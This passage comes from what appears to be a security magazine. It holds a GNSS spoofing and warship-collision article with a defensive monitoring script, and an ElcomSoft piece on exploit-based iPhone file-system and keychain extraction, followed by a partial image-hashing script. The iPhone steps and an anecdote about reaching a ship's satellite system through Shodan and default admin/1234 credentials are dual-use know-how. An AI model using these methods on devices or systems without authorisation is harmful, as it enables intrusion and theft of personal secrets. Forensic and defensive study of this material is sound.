pressure. As the public shows interest in security, the producers will offer it.<br />
Security Expert Recommendations<br />
To recap everything we've established so far: hacking vehicles is possible and has some precedent, and<br />
manufacturers are addressing the issue. Additionally, drivers can protect themselves as a supplementary<br />
layer of security. The last step in deciding whether this is a cause for worry is looking to the experts. So<br />
what do they think?<br />
Cybersecurity authorities have become increasingly concerned with vehicle hacking in the past few years.<br />
Late last year, the Federal Bureau of Investigation (FBI) warned of growing cyberthreats in the automotive<br />
industry. The Bureau cited the increase of data coming from vehicles as a reason why hackers may target<br />
cars.<br />
In response to these threats, the FBI suggested auto companies take cybersecurity more seriously.<br />
Notice they didn't say to abandon the concept of a connected car altogether. Manufacturers should just<br />
keep security at the forefront.<br />
Vehicle Cybersecurity Today and Tomorrow<br />
With all these factors in mind, should we be worried about vehicle hacking? There may not be a cause<br />
for worry, but there is certainly reason for increased concern. This issue is a minor one right now, but it's<br />
also growing. It requires adequate attention, but not panic.<br />
Vehicle hacking isn't a widespread problem today, but it could become one in the future. Manufacturers<br />
should start investing in more thorough security solutions as they add more internet-enabled functions to<br />
their automobiles. By addressing these issues today, we can stop a crisis tomorrow.<br />
The Age of IoT Brings New Challenges<br />
Technological revolutions always come with some growing pains. As the IoT becomes more prevalent,<br />
cybersecurity likewise turns into a more pressing concern. That doesn't mean we should avoid the era of<br />
connectivity, but that we should take care to secure it.<br />
You shouldn't worry about vehicle hacking, but you should take it seriously. With a widespread effort to<br />
combat security issues before they appear, the future of connected vehicles will come sooner.<br />
About the Author<br />
Martin Banks is the founder and Editor-in-Chief of Modded. You can find<br />
his writing all over the internet. He covers tech, gear, cars, and more.<br />
Cyber Attacks at Sea: Blinding Warships<br />
Is GPS completely vulnerable to cyberattacks?<br />
By Julien Chesaux, Cyber Security Consultant, Kudelski Security<br />
Who Controls the Sea, Controls the World<br />
The annual multilateral exercise between the U.S. and Thai armed forces, named “Cobra Gold”,1 sees the<br />
deployment of the latest navy warships as proof of military dominance in a contested region and<br />
reminds us of the fragility of technologies at sea, as a chain of incidents demonstrated in 2017.<br />
The world’s oceans can be beautiful and awe-inspiring, but also very dangerous. Most importantly, they<br />
are strategic for the global economy and, consequently, countries compete to control them. Statistics<br />
reveal the high value of the high seas: 70% of the globe is covered by water and over 90% of the world’s<br />
trade is carried by sea. Moreover, the global merchant fleet totals 50,000 ships that move 9 billion tons<br />
of merchandise annually, representing a turnover of $2,000 billion.2<br />
Human history is punctuated by regional or global turning points that were settled in decisive<br />
battles at sea. The battle of Salamis saw the Athenians save the concept of democracy against the<br />
Persians. The battle of Actium allowed the Roman Republic to become an Empire. The battle of Trafalgar<br />
destroyed Napoleon’s aspiration to invade Britain.<br />
At the beginning of the 20th century, in 1905, the battle of Tsushima humiliated the Russian Empire and<br />
opened the pathway for Imperial Japan. During WWI, the battle of Jutland contained the Imperial<br />
1. WILLIAMS Zachary. “Cobra Gold 2020: America’s Strategic Shift in Southeast Asia”, The Diplomat, Mar 6, 2020, https://thediplomat.com/2020/03/cobra-gold-2020-americas-strategic-shift-in-southeast-asia/<br />
2. Sea Europe. “2017 Market Forecast Report”, Sea Europe, 2016, https://maritimetechnology.nl/media/2017-Market-Forecast-Report-finaal.pdf<br />
German Navy, and WWII witnessed the battle of Midway, which established the U.S. as the new naval<br />
superpower after the destruction of the Japanese aircraft carrier fleet in the Pacific. More recently, the<br />
annexation of Crimea by Russia was, even if triggered by different causes, a geopolitical move to avoid the<br />
loss of access to the Mediterranean Sea.<br />
The current hawkish posture and the “gunboat diplomacy” followed by China are no surprise given<br />
its ambitions to play a greater global leadership role, to protect the shores where most of its economic<br />
activity occurs (its “strategic belt”), and to defend its natural resources and the sea lines that supply them, from<br />
the South and East China Seas (the area marked by the Nine-Dash line) to the Indian Ocean (currently projected<br />
as the “String of Pearls”3).<br />
A Global Rivalry with Multiple Bottlenecks<br />
Because globalization increases global trade, sea routes are busy and multiple bottlenecks are under the<br />
spotlight, including many straits and canals. For instance, the Strait of Malacca carries 40% of global<br />
trade and 50% of energy trade, and is indispensable for regional hegemons like China and Japan.<br />
Another geostrategic path is the Strait of Hormuz, between Oman and Iran, through which all the Gulf oil<br />
trade moves. In this region, the U.S. Navy is face-to-face with the Iranian one. The USS Harry S. Truman<br />
aircraft carrier is presently deployed in the Arabian Sea (near Oman) as part of the U.S. 5th Fleet, which<br />
covers the Middle East, a crucial region for the U.S. as 18% of its imported oil comes from the Persian<br />
Gulf countries.4 In 1967, the blockade of the Strait of Tiran by Egypt was used as a casus belli by Israel<br />
and started the Six-Day War. Indeed, the Strait is the only way to leave the Gulf of Aqaba and gain access<br />
to Iran’s oil. Other important passages such as the Bab El-Mandab Strait, the Danish Straits and the<br />
Bosporus are well-known narrow chokepoints.<br />
Canals are equally critical for international trade, especially the Suez and Panama Canals. The former<br />
was the theater of a war in 1956 between Egypt and a French, British and Israeli alliance (formalized<br />
in the secretive Protocol of Sèvres) to regain control after its nationalization by the infamous Egyptian<br />
President Nasser. The latter, under U.S. control for almost 100 years, was handed back to Panama and<br />
recently enlarged to accommodate the new, bigger ships and secure revenue for Panama, as it represents<br />
5.5% of its GDP.<br />
The Art of Hacking Navigation Systems<br />
In 2017, several incidents at sea raised questions, as hundreds of South Korean fishing vessels<br />
returned early to port after their GPS (Global Positioning System) signals were jammed, allegedly by<br />
3. HUGHES Lindsay. “String of Pearls Redux: Increased Concern for India”, Future Directions International, Nov 13, 2018, http://www.futuredirections.org.au/publication/string-of-pearls-redux-increased-concern-for-india/<br />
4. U.S. Energy Information Administration (EIA). “How much petroleum does the United States import and export?”, EIA, Apr 4, 2017, https://www.eia.gov/tools/faqs/faq.php?id=727&t=6<br />
North Korean hackers.5 Later that year, a ship in the Black Sea reported to the U.S. Coast Guard<br />
Navigation Center that its GPS system had been disrupted and that over 20 ships in the same area had<br />
been similarly affected.6 In Asian waters, deadly collisions happened twice in two months: in June 2017,<br />
the USS Fitzgerald was struck by a container ship off the coast of Japan, killing 7 sailors. Later in<br />
the year, an oil tanker struck the USS John S. McCain near the Malaysian coast and 10 sailors died.7<br />
There were also two other lesser-known incidents in 2017: in January, the USS Antietam ran aground<br />
near its base in Japan, and in May the USS Lake Champlain collided with a South Korean fishing vessel.8<br />
Consequently, Vice Admiral Joseph Aucoin was relieved of his duty as commander of the U.S. 7th Fleet,<br />
the largest forward-deployed U.S. fleet, based in Japan and covering Asia.9<br />
The causes of all these incidents are not clear. Some experts blame the weather, the heavy reliance on<br />
technology, the weak GPS signal, cyberattacks, reduced crew numbers or the high pace of<br />
deployment, which leaves little time for training and maintenance. Given the number of incidents in a<br />
less-than-one-year period and the highly disputed regions where they happened (South East Asia and East Asia), the<br />
theory of deliberate interference with navigation systems through cyberattacks is legitimate, especially<br />
when the navigation system in use is analyzed.<br />
Ships orientate themselves through Global Navigation Satellite Systems (GNSS), with many countries<br />
using their own: GPS for the U.S., GLONASS for Russia, GALILEO for the E.U., QZSS for Japan, BeiDou<br />
for China, and NAVIC for India. Although precise to a few meters, this technology is not highly secure<br />
because the signal is weak and can be hacked. The same year as these incidents, a security<br />
researcher based in France was able to enter the satellite communications system of a ship: through<br />
Shodan, a search engine that can reveal internet-connected devices, and by entering a simple username<br />
(admin) and password (1234), he accessed the communication center of a commercial ship and posted<br />
his feat on Twitter: “I’m connected to a mother****ing ship as admin right now. Hacking ships is<br />
easy”.10<br />
New Alternatives<br />
To reduce this over-dependency on GNSS for Positioning, Navigation and Timing (PNT), some states<br />
are developing alternatives that rely on terrestrial radio frequency, an old technology used since WWII. One of<br />
5. SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017, https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT<br />
6. Ibid.<br />
7. FIFIELD Anna. “Bodies of all 10 sailors missing on USS John S. McCain have been recovered”, The Washington Post, Aug 27, 2017, https://www.washingtonpost.com/world/bodies-of-all-10-sailors-missing-on-uss-john-s-mccain-have-been-recovered/2017/08/27/a2af6c4a-8b8c-11e7-a2b0-e68cbf0b1f19_story.html<br />
8. BARANIUK Chris. “Why it’s not surprising that ship collisions still happen”, BBC, Aug 22, 2017, http://www.bbc.com/future/story/20170822-why-its-not-surprising-that-ship-collisions-still-happen<br />
9. AFP. “U.S. Warship Collisions Raise Cyberattack Fears”, Security Week, Aug 23, 2017, http://www.securityweek.com/us-warship-collisions-raise-cyberattack-fears<br />
10. CHAMBERS Sam. “Ship’s satellite communication system hacked with ease”, Splash 24/7, Jul 19, 2017, http://splash247.com/ships-satellite-communication-system-hacked-ease/<br />
these systems is called eLoran (Enhanced LOng-RAnge Navigation) and, although it is less accurate,<br />
regional, and only two-dimensional, it offers a powerful signal that resists jamming or spoofing.11 Cost<br />
and political inertia have thwarted this technology, but this is likely to change given these events.<br />
South Korea is currently testing this technology and Russia is developing its own eLoran, named<br />
eChayka.12 In the U.S., the Director of National Intelligence told a Senate committee that the global<br />
threat of electronic warfare attacks against space systems would rise in coming years, and the U.S. Navy<br />
launched a Hack-Our-Ship event to assess cyber threats at sea, such as hacking a complex software<br />
system simulating the ones used to control the U.S. Navy fleets.13,14<br />
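The article's point is that a weak GNSS signal can be jammed or spoofed and that an independent source (eLoran, or the ship's own log) is the defense. The following Python monitor is an added example, not code from the article or from Kudelski Security: it cross-checks a GNSS fix stream against a dead-reckoning estimate built from the ship's heading and speed log, flagging lost fixes (jamming), physically impossible jumps and smooth drift away from the reckoned track (spoofing). The track, thresholds and injected anomalies are all constructed for illustration.<br />

```python
"""GNSS fix plausibility monitor (added example): flags jamming (lost fixes) and
spoofing (fixes that jump or drift away from the ship's own dead-reckoned track)."""
import math
from dataclasses import dataclass
from typing import List, Optional, Tuple

EARTH_RADIUS_M = 6_371_000.0
KNOT_MS = 0.514444  # metres per second in one knot


@dataclass
class Fix:
    t: float               # seconds since start of the watch
    lat: Optional[float]   # degrees; None when the receiver reports no fix
    lon: Optional[float]
    hdop: float            # horizontal dilution of precision (large = poor geometry)


@dataclass
class LogEntry:
    t: float
    heading_deg: float     # true heading from the gyro/compass
    speed_kn: float        # speed through the water from the ship's log


def haversine_m(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in metres between two lat/lon points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp, dl = p2 - p1, math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def dead_reckon(lat: float, lon: float, heading_deg: float,
                speed_kn: float, dt_s: float) -> Tuple[float, float]:
    """Advance a position along heading at speed for dt seconds (short-leg approximation)."""
    dist = speed_kn * KNOT_MS * dt_s
    brg = math.radians(heading_deg)
    dlat = dist * math.cos(brg) / EARTH_RADIUS_M
    dlon = dist * math.sin(brg) / (EARTH_RADIUS_M * math.cos(math.radians(lat)))
    return lat + math.degrees(dlat), lon + math.degrees(dlon)


def check_track(fixes: List[Fix], log: List[LogEntry], max_speed_kn: float = 35.0,
                dr_tolerance_m: float = 500.0, hdop_limit: float = 5.0) -> List[Tuple[float, str]]:
    """Return (time, reason) alerts. `log` is sampled at the same instants as `fixes`.
    An untrusted fix never re-anchors the dead-reckoning (DR) estimate, so a spoofer that
    pulls the track away slowly still accumulates divergence against DR."""
    alerts: List[Tuple[float, str]] = []
    trusted: Optional[Tuple[float, float, float]] = None  # (t, lat, lon) of last accepted fix
    dr: Optional[Tuple[float, float]] = None              # DR position carried from it
    for i, fx in enumerate(fixes):
        if dr is not None and i > 0:                   # advance DR with the previous log entry
            prev = log[i - 1]
            dr = dead_reckon(dr[0], dr[1], prev.heading_deg, prev.speed_kn, fx.t - fixes[i - 1].t)
        if fx.lat is None or fx.lon is None:
            alerts.append((fx.t, "NO_FIX"))            # lock lost: the classic jamming symptom
            continue
        if fx.hdop > hdop_limit:
            alerts.append((fx.t, "POOR_GEOMETRY"))
            continue
        if trusted is None:                            # first usable fix seeds the track
            trusted, dr = (fx.t, fx.lat, fx.lon), (fx.lat, fx.lon)
            continue
        t0, lat0, lon0 = trusted
        implied_kn = haversine_m(lat0, lon0, fx.lat, fx.lon) / (fx.t - t0) / KNOT_MS
        if implied_kn > max_speed_kn:                  # the hull cannot move that fast
            alerts.append((fx.t, "IMPLAUSIBLE_JUMP"))
            continue
        if haversine_m(dr[0], dr[1], fx.lat, fx.lon) > dr_tolerance_m:
            alerts.append((fx.t, "DR_DIVERGENCE"))     # smooth but wrong: spoofing signature
            continue
        trusted, dr = (fx.t, fx.lat, fx.lon), (fx.lat, fx.lon)
    return alerts


def sample_scenario() -> Tuple[List[Fix], List[LogEntry]]:
    """Constructed data: a ship steaming 090 at 12 kn, sampled every 60 s, with a spoofed
    jump, a gradual pull-off and a jammed interval injected into the GNSS feed."""
    n, dt = 8, 60.0
    truth = [(1.2000, 103.8000)]
    for _ in range(n - 1):
        truth.append(dead_reckon(truth[-1][0], truth[-1][1], 90.0, 12.0, dt))
    log = [LogEntry(dt * i, 90.0, 12.0) for i in range(n)]
    fixes: List[Fix] = []
    for i, (lat, lon) in enumerate(truth):
        if i == 6:
            fixes.append(Fix(dt * i, None, None, 99.0))   # receiver lost lock
            continue
        if i == 3:
            lat += 0.020             # ~2.2 km north of truth in one minute: abrupt spoof
        elif i in (4, 5):
            lat += 0.006 * (i - 3)   # gradual pull-off: ~0.67 km, then ~1.33 km north
        fixes.append(Fix(dt * i, lat, lon, 1.2))
    return fixes, log


if __name__ == "__main__":
    for t, reason in check_track(*sample_scenario()):
        print(f"t={t:5.0f}s  {reason}")
```

On the constructed scenario the monitor raises an implausible-jump alert at 180 s, dead-reckoning divergence at 240 s and 300 s, and a no-fix alert at 360 s, while the honest fixes before and after pass.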
Military and Economic Implications<br />
In network-centric warfare, the military relies on information gathering to Observe, Orient, Decide and Act<br />
(the OODA loop), and GNSS are among the tools used to collect that information. On the battlefield, it is the<br />
capacity to make the right decision as quickly as possible, and specifically quicker than your enemy, that makes the<br />
difference between victory and defeat, life and death. Therefore, an army relying too much on one technology<br />
could be “blinded” during a conflict and unable to allocate its forces efficiently.<br />
Following the 19th-century American naval strategist Alfred T. Mahan, the U.S. developed after WWII a great<br />
power projection capability that enables it to rapidly deploy military means to defend any interest,<br />
whether political, economic, military or humanitarian. Power projection is a mix of hard and soft power,<br />
depending on the situation. This approach is materialized by aircraft carriers and by the separation of fleets<br />
allocated to specific regions of the globe (7 for the U.S. Navy).<br />
Aircraft carriers do not travel the sea alone: an entire structure of ships and submarines escorts<br />
them, known as a carrier strike group (CSG), with a total crew of more than 7,500.15 The total acquisition<br />
cost of a CSG exceeds $25 billion, an air wing (the aircraft on the carrier) another $10 billion, and<br />
estimated annual operating costs are around $1 billion.16 Currently, the U.S. has 10 Nimitz-class<br />
nuclear-powered supercarriers. Therefore, a major cyberattack on navigation systems, for example, could<br />
paralyze an entire CSG and considerably diminish the U.S. ability to maneuver.<br />
On the economic side, the world’s largest container shipping and supply vessel company, Moller-Maersk,<br />
suffered from the wiper malware attack named NotPetya, and the company reported a loss of between USD<br />
11. SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017, https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT<br />
12. DUNN John E. “Cyberattacks on GPS leave ships sailing in dangerous waters”, Naked Security, Aug 7, 2017, https://nakedsecurity.sophos.com/2017/08/07/cyberattacks-on-gps-leave-ships-sailing-in-dangerous-waters/<br />
13. SAUL Jonathan. “Cyber threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017, https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT<br />
14. OWENS Katherine. “Navy conducts ‘Hack-Our-Ship’ cybersecurity event”, Defense Systems, Mar 13, 2017, https://defensesystems.com/articles/2017/03/13/hacknavy.aspx<br />
15. WISE David W. “The U.S. Navy’s Big Mistake – Building Tons of Supercarriers”, War Is Boring, Dec 25, 2016, https://warisboring.com/the-u-s-navys-big-mistake-building-tons-of-supercarriers/<br />
16. Ibid.<br />
200-300 million for Q3 2017.17 More specifically, navigation systems such as the Electronic Chart<br />
Display and Information System (ECDIS) are very vulnerable and have also been hit, with different attacks<br />
reported in Asia. According to the maritime technical lead at cyber security firm NCC Group, "Ecdis systems pretty much<br />
never have anti-virus".18<br />
Pyongyang Hackers are Smart<br />
Both of the military vessels involved in collisions, the USS Fitzgerald and the USS John S. McCain, are<br />
guided missile destroyers equipped with the Aegis Ballistic Missile Defense System (BMDS), a<br />
system allowing the interception of ICBMs (Intercontinental Ballistic Missiles), the type currently<br />
being tested by North Korea and usually equipped with one or multiple nuclear warheads. An ICBM flight has<br />
four phases: boost, post-boost/ascent, midcourse and terminal (re-entry into the atmosphere). The Aegis<br />
BMDS aims at destroying an ICBM during the post-boost/ascent phase (before the missile leaves earth’s<br />
atmosphere).<br />
The Lazarus hacking group, famous for the Sony breach in 2014 and allegedly linked to North Korea,<br />
targets individuals associated with U.S. defense contractors with the same tools and tactics as the Sony<br />
breach. This time, the phishing emails display fake job listings and companies’ internal policies.19 Some<br />
of the jobs listed were for the U.S. THAAD (Terminal High Altitude Area Defense) system, which is a BMDS that<br />
intercepts an ICBM in its terminal phase (after the missile re-enters the atmosphere).<br />
Therefore, if the four U.S. Navy collisions in Asian waters are due to a cyberattack, the explanation could<br />
be that the North Korean government is attempting to infiltrate U.S. military systems in order to<br />
collect information on the full spectrum of BMDS and, at best, disrupt the defenses against its<br />
ICBMs. On the diplomatic side, it could be a strong message sent to the U.S. and its Asian allies, assuring<br />
them that Pyongyang has serious capabilities and that it would be better to negotiate with it than to escalate<br />
tensions.<br />
This strategy is part of a general trend in APTs (Advanced Persistent Threats): long-term, targeted<br />
cyberattacks mixing social engineering, cyberweapons and multiple vectors to get inside<br />
networks. Instead of directly hacking the big fish such as the Department of Defense or a big player in<br />
weapons (Aegis, Boeing, Lockheed Martin, etc.), hackers will target a third party working for these targets.<br />
Indeed, its cybersecurity posture will be weaker than that of a critical administration or company with<br />
cyberdefense technologies and processes in place and with employees who are aware of<br />
phishing campaigns.<br />
17. MIMOSO Michael. “MAERSK Shipping Reports $300M Loss Stemming from NotPetya Attack”, Threatpost, Aug 16, 2017, https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/<br />
18. BARANIUK Chris. “How hackers are targeting the shipping industry”, BBC, Aug 18, 2017, http://www.bbc.com/news/technology-40685821<br />
19. BARTH Bradley. “Lazarus Group tied to new phishing campaign targeting defense industry workers”, SC Media, Aug 14, 2017, https://www.scmagazine.com/lazarus-group-tied-to-new-phishing-campaign-targeting-defense-industry-workers/article/681701/<br />
Future Tensions at Sea<br />
Among many strategic hotspots, the most sensitive ones are currently the Indian Ocean, the South and<br />
East China Seas, and, for the foreseeable future, the Arctic.<br />
The Indian Ocean is now a space of geopolitical criticality from a maritime perspective, especially now<br />
that the U.S. wants to improve its relations with New Delhi to counterbalance Beijing’s aspirations in the<br />
context of the BRI (Belt and Road Initiative). China is determined to change the status quo in this region<br />
and is investing in ports (i.e. the String of Pearls) to control the flow of merchandise along sea lines from<br />
China to the Middle East and Africa.<br />
Indeed, these sea lines through the Indian Ocean are vital for China’s oil imports, as about 40% comes<br />
through the Strait of Hormuz and over 80% through the Malacca Strait.20 Thus, the rationale for shifting<br />
from a land-based armed force to a sea-based one is to defend these interests at sea and protect China’s<br />
position as a regional hegemon. Hence, the People’s Liberation Army is building aircraft carriers, submarines<br />
and patrol vessels, and has put in place an A2/AD (Anti-Access/Area Denial) tactic with investments in<br />
shore-based anti-ship missiles. Ultimately, China wants to push the U.S. beyond its second island chain (on the<br />
east side of the Philippine Sea).<br />
As pointed out by The Economist, the Asia Pacific is the trade region of the future: Eight out of the world’s<br />
ten busiest container ports are there. Two-thirds of the world’s oil shipments travel across the Indian<br />
Ocean. Almost 30% of maritime trade goes across the South China Sea; it accounts for over 10% of<br />
world fisheries production and is thought to have oil and natural-gas deposits beneath its seabed.21<br />
Another strategic hotspot will emerge to the north: the Arctic. Within decades, melting ice<br />
will open shipping lanes, allowing vessels like Russia’s first ice-class LNG (Liquefied Natural Gas) tanker<br />
to travel through the region. It will also increase disputes over access to resources and over the preservation<br />
of its fragile ecosystem.22<br />
As in Rudyard Kipling’s novel “Kim”, which popularized the great game between the British<br />
and Russian empires for control of Central Asia in the 19th century, the new great game is now between<br />
the U.S. and China for the control of all Asia. This rivalry will encompass the use and leverage of sea<br />
power, as naval strategist Alfred T. Mahan put in perspective in “The Influence of Sea Power Upon History”:<br />
national prosperity and power depend on the control of the world's sea lanes, thus "Whoever rules the<br />
waves rules the world".23<br />
20. The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015, https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules<br />
21. Ibid.<br />
22. Author interviews. “‘Stavridis’ Book ‘Sea Power’ Explains Why Oceans Matter in Global Politics”, NPR, Jun 6, 2017, http://www.npr.org/2017/06/06/531701056/stavridis-book-sea-power-explains-why-oceans-matter-in-global-politics<br />
23. MAHAN Alfred Thayer. “The Influence of Sea Power upon History: 1660-1783”, Little, Brown and Company, Boston, 1890<br />
About the Author<br />
Julien Chesaux is a Cyber Security Consultant at Kudelski Security, a<br />
Swiss and American cyber security company. Julien mainly works on<br />
cyber security, information security and geopolitics analysis in order to<br />
help clients to find solutions regarding their threats. He is also a speaker<br />
and writer for different think tanks, journals and events. He has worked in<br />
diplomacy and cyber security for 10 years in Switzerland, Australia, the<br />
Balkans and France. His main research interests are Global Security,<br />
Cyber Geopolitics, and International Affairs.<br />
LinkedIn profile: www.linkedin.com/in/julien-chesaux-65279456<br />
You can reach me at julien.chesaux@gmail.com<br />
iPhone Extraction Without a Jailbreak<br />
Imaging the file system and decrypting the keychain from iOS devices without jailbreaking<br />
By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd.<br />
Traditionally, forensic experts without access to proprietary technologies have relied upon jailbreaks to<br />
perform the lowest-level extraction of Apple iOS devices. Using jailbreaks, even advanced ones exploiting<br />
hardware vulnerabilities, presents a number of challenges. In this article, we offer an alternative<br />
method for accessing the content of iOS devices that does not require jailbreaking.<br />
Jailbreak-based acquisition<br />
Before covering jailbreak-free extraction, let’s talk about jailbreaks.<br />
Why is a jailbreak needed during the course of file system extraction? Jailbreaking the device allows<br />
experts to raise privileges to the level required to access the protected file system on the device, which<br />
is simply not possible on Apple devices without superuser access. In addition, a jailbreak was the only<br />
way to extract and decrypt the complete content of the keychain, which holds all of the user’s saved<br />
passwords and items such as certificates, identities and encryption keys (e.g. keys to the encrypted<br />
databases of third-party password managers). In other words, a jailbreak was (and still is) used to obtain<br />
the required level of privileges for accessing things such as application sandboxes, stored passwords<br />
and encryption keys.<br />
Why not just keep using a jailbreak?<br />
If jailbreaks are such a great thing, why don’t we keep using them for low-level extractions? The thing is,<br />
jailbreaks bring their share of problems. First and most importantly, public jailbreaks were never meant<br />
for mobile forensics. Installing a jailbreak unnecessarily modifies the system partition (making the<br />
post-acquisition future of the device uncertain). Since public jailbreaks are designed to allow running unsigned code<br />
(such as the various apps downloaded from third-party app stores), they make far more (and far deeper)<br />
modifications to the system than would be necessary for the purpose of forensic acquisition.<br />
Finding the right jailbreak and installing it properly may also become a challenge if you are not<br />
accustomed to this sort of thing. For these and other reasons, jailbreaking may not be an option for<br />
some experts. This is where jailbreak-free acquisition comes to help.<br />
How jailbreak-free acquisition works<br />
In the previous section, I wrote that one needs low-level access to the file system in order to perform the<br />
extraction, and this still holds even if you are not going to use a jailbreak. We developed a different<br />
method for obtaining the required level of privileges on a wide range of iOS devices. Explaining the<br />
essence of the method brings us back to jailbreaking.<br />
Essentially, a jailbreak exploits several vulnerabilities discovered in a given version of iOS or a range of<br />
iOS versions. The vulnerabilities are exploited in sequence, which makes it a chain<br />
of exploits. A jailbreak requires a number of different exploits to escape the sandbox, obtain<br />
superuser access and disable the various protections iOS has in place to prevent this sort of thing. Finally,<br />
a jailbreak opens read/write access to the system partition and patches several files in order to disable<br />
signature verification, which allows installing apps lacking Apple approval from third-party app stores.<br />
While this is a grand oversimplification, you get the idea: a jailbreak does a lot of things that aren’t<br />
necessary for just extracting the file system and obtaining the keychain.<br />
A given jailbreak can be installed on a given version of iOS (or a range of versions of iOS). Different<br />
jailbreaks are required to break into the different versions of the system since different exploits are<br />
required. Our method automatically detects the installed version of iOS and applies exactly those exploits<br />
that are minimally required to obtain access to the file system. To do that, one must sign and install the<br />
‘agent’ app to the device, and then use that agent to extract the file system and decrypt the keychain.<br />
Unlike jailbreaks, the agent performs all modifications in the device’s volatile memory (RAM) without<br />
writing anything unnecessary to persistent storage. The agent does not even touch the system partition,<br />
leaving the post-acquisition device perfectly usable and updatable.<br />
Why choose jailbreak-free extraction over jailbreaks<br />
There are numerous advantages of agent-based extraction over jailbreaks.<br />
1. Jailbreak-free extraction is safe. The agent does not touch the system partition, leaving the device<br />
in a clean state after the acquisition.<br />
2. Clean and forensically sound. The agent writes nothing unnecessary to the data partition and<br />
leaves no traces behind except for a few records in the system log.<br />
3. Much easier to handle. Most jailbreaks (except checkra1n, which uses a hardware exploit) are<br />
limited to a narrow range of iOS versions. The agent has all the exploits required to gain access<br />
to the data, and automatically applies the right exploit for a given version of iOS.<br />
4. Robust operation. Jailbreaks are wonky to install, (very) frequently failing without an obvious<br />
reason or any path forward. We are yet to see a single case where the agent would fail on a<br />
supported platform.<br />
5. Offline operation. The agent can and should be installed with the device being in Airplane mode.<br />
An Internet connection on the iPhone is never required, making it a safe, risk-free extraction.<br />
Agent-based extraction also has two major drawbacks.<br />
1. You will absolutely need a Developer account with Apple to sign and install the agent. A Developer<br />
account with Apple costs money (around $100/year if you use a personal one).<br />
2. The agent is available for a wide but still limited range of iOS versions, currently supporting iOS<br />
10.0 through iOS 13.4.1 inclusive. Extracting an iPhone running a newer iOS build would be only<br />
possible if we discover the corresponding exploit. Alternatively, the checkra1n jailbreak may be<br />
available if the device is an iPhone 8, 8 Plus or iPhone X or older.<br />
How to use jailbreak-free extraction<br />
Jailbreak-free extraction is available through Elcomsoft iOS Forensic Toolkit. You will also need an Apple<br />
ID enrolled in Apple’s Developer Program, and have an app-specific password created in your profile.<br />
Write down that password; you’ll need it to sign the extraction agent. The acquisition steps are:<br />
1. Connect the iPhone to your computer. Approve the pairing request (you may have to enter the<br />
passcode on the device to do that).<br />
2. Launch Elcomsoft iOS Forensic Toolkit. The main menu will appear.<br />
3. We strongly recommend performing logical acquisition first (creating a backup, extracting<br />
media files, etc.).<br />
4. For agent-based extraction, you’ll be using numeric commands.<br />
5. Press 1 to install the agent onto the iPhone. Enter the Apple ID and the app-specific password<br />
you’ve created in the developer profile, then type the ‘Team ID’ related to your developer account.<br />
6. The agent is installed on the device. Tap on the Agent icon on the iPhone to launch it, and keep<br />
it in the foreground during the extraction.<br />
7. Press 2 to extract and decrypt the keychain (you can view it in Elcomsoft Phone Viewer).<br />
8. Press 3 to capture the file system image. The tool uses the TAR format to save the file system<br />
image. You can view it with Elcomsoft Phone Viewer or third-party forensic tools.<br />
9. Press 4 to clean up and uninstall the agent from the iPhone.<br />
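Step 8 leaves you with a TAR archive of the file system, and point 2 above stresses that the acquisition should be forensically sound. What a practitioner wants right after the capture is an integrity record of that image: a hash of the whole archive plus a per-file manifest that can be re-checked later in the chain of custody. The script below is an added example and is not code from the article or from Elcomsoft’s toolkit; it builds a manifest for any TAR image and re-verifies it. The sample archive, its paths and its contents are constructed inline for illustration and are not taken from a real device.<br />

```python
"""Build and verify an integrity manifest for a file-system image stored as TAR.

Added example, not part of the article or of Elcomsoft iOS Forensic Toolkit.
The toolkit saves the extracted file system as a TAR; this script hashes the
archive and every regular file inside it so the acquisition can be verified
later. The sample archive below is constructed in memory for the demo.
"""
import hashlib
import io
import tarfile
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Entry:
    path: str
    size: int
    mtime: int
    sha256: str  # empty for directories, symlinks and device nodes


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(archive: bytes) -> Dict[str, object]:
    """Hash the archive as a whole and each regular file member inside it."""
    entries: List[Entry] = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for member in tar:
            digest = ""
            if member.isfile():
                fobj = tar.extractfile(member)
                if fobj is not None:
                    digest = sha256_bytes(fobj.read())
            entries.append(Entry(member.name, member.size, int(member.mtime), digest))
    return {
        "archive_sha256": sha256_bytes(archive),
        "archive_size": len(archive),
        "entry_count": len(entries),
        "entries": entries,
    }


def verify_archive(archive: bytes, manifest: Dict[str, object]) -> bool:
    """Re-hash the archive and compare with the recorded manifest.

    Any change to the archive bytes (corruption or tampering) fails the check.
    """
    fresh = build_manifest(archive)
    return (fresh["archive_sha256"] == manifest["archive_sha256"]
            and fresh["entries"] == manifest["entries"])


def make_sample_image() -> bytes:
    """Constructed sample: a tiny TAR imitating a few paths of an extracted file system.

    Paths and contents are invented for the demo, not taken from a real device.
    """
    buf = io.BytesIO()
    files = {
        "private/var/mobile/Library/Preferences/com.example.plist": b"<plist/>",
        "private/var/mobile/Media/DCIM/100APPLE/IMG_0001.HEIC": b"\x00\x00\x00\x18ftypheic",
    }
    with tarfile.open(fileobj=buf, mode="w") as tar:
        dir_info = tarfile.TarInfo("private/var/mobile")
        dir_info.type = tarfile.DIRTYPE
        dir_info.mtime = 1590000000
        tar.addfile(dir_info)
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = 1590000000
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    image = make_sample_image()
    manifest = build_manifest(image)
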